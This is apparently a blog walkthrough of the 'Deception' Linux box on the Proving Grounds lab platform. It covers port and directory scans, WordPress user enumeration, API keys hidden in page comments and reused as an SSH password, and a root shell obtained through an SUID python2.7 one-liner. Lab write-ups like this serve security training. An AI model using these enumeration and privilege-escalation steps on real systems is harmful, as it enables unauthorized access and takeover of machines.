Proving Grounds >> Deception

Table of Content
  • Target OS: Linux
  • Rated Difficulty: Intermediate

ENUM >> NMAP

# Nmap 7.92 scan initiated Tue Feb 15 15:54:24 2022 as: nmap -sS -v -sV -oN nmap_initial 192.168.178.34
Nmap scan report for 192.168.178.34
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 15 15:54:38 2022 -- 1 IP address (1 host up) scanned in 14.08 seconds

ENUM >> GoBuster scan on webroot

❯ gobuster dir -u http://192.168.178.34 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -x php,html -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.178.34
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
2022/02/15 17:19:50 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 11026]
/index.html           (Status: 200) [Size: 11026]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.178.34/javascript/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.178.34/phpmyadmin/]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.178.34/wordpress/]

===============================================================
2022/02/15 17:23:24 Finished
===============================================================
  • Deception is the key here… both /phpmyadmin and /wordpress are older versions, but not exactly exploitable… phpmyadmin is a complete dead-end. However, besides a userlist, the /wordpress directory will point us to a hint.html if you scan the folder via GoBuster/FeroxBuster/dirbuster/etc… with any of the raft- or directory-list- wordlists and ensure you enable html with -x if using GoBuster):

ENUM >> wpscan on /wordpress

  • Here is our two users to target:
❯ wpscan --url http://192.168.178.34/wordpress/ -t 20 -e vp,vt,u1-10
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <===============================================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] yash
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] haclabs
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
LOOT >> hint.html in /wordpress
<html>
    <body>
        <p>Please collect all the API tokens availabe on the home page</p>
    </body>
</html>
  • OK, easy enough…
LOOT >> API keys in /index.html
  • These are found throughout the file hidden away in <!-- comments… simply searching the source for "API" will get you the below:

PRIVESC >> ssh access to yash account

  • yash is the winner of the user-lotto:
❯ ssh yash@192.168.178.34
yash@192.168.178.34's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.0.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

...

opeartion going on=====================> Copy password to /haclabs
System compromised!!!ALERT
Copy operation aborted
yash@haclabs:~$

PRIVESC >> SUID python

  • SUID python2.7 binary – this one is pretty self-explanatory:
yash@haclabs:/tmp$ /usr/bin/python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# 


Leave a Reply

Your email address will not be published.